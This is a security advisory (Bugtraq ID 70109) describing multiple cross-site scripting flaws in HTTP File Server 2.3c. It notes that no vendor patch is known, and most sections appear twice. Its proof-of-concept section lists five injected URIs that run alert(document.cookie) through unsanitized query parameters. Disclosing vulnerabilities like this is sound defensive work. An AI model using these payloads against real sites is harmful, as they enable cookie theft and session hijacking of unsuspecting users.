HTTP File Server Multiple Cross Site Scripting Vulnerabilities
BID:70109
Info
HTTP File Server Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 70109 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 24 2014 12:00AM |
| Updated: | Sep 24 2014 12:00AM |
| Credit: | Mahendra |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
HTTP File Server Multiple Cross Site Scripting Vulnerabilities
HTTP File Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HTTP File Server 2.3c is vulnerable; other versions may also be affected.
HTTP File Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
HTTP File Server 2.3c is vulnerable; other versions may also be affected.
Exploit / POC
HTTP File Server Multiple Cross Site Scripting Vulnerabilities
To exploit these issues, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/?tpl=list'/><script>alert(document.cookie)</script>&folders-filter=/&recursive
http://www.example.com/?sort=n'/><script>alert(document.cookie)</script>
http://www.example.com/?mode=n'/><script>alert(document.cookie)</script>
http://www.example.com/?mode=section&id=style.css'/><script>alert(document.cookie)</script>
http://www.example.com/?'onmouseover='alert(11)'
To exploit these issues, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/?tpl=list'/><script>alert(document.cookie)</script>&folders-filter=/&recursive
http://www.example.com/?sort=n'/><script>alert(document.cookie)</script>
http://www.example.com/?mode=n'/><script>alert(document.cookie)</script>
http://www.example.com/?mode=section&id=style.css'/><script>alert(document.cookie)</script>
http://www.example.com/?'onmouseover='alert(11)'
Solution / Fix
HTTP File Server Multiple Cross Site Scripting Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
HTTP File Server Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Http File Server Home Page (Http File Server)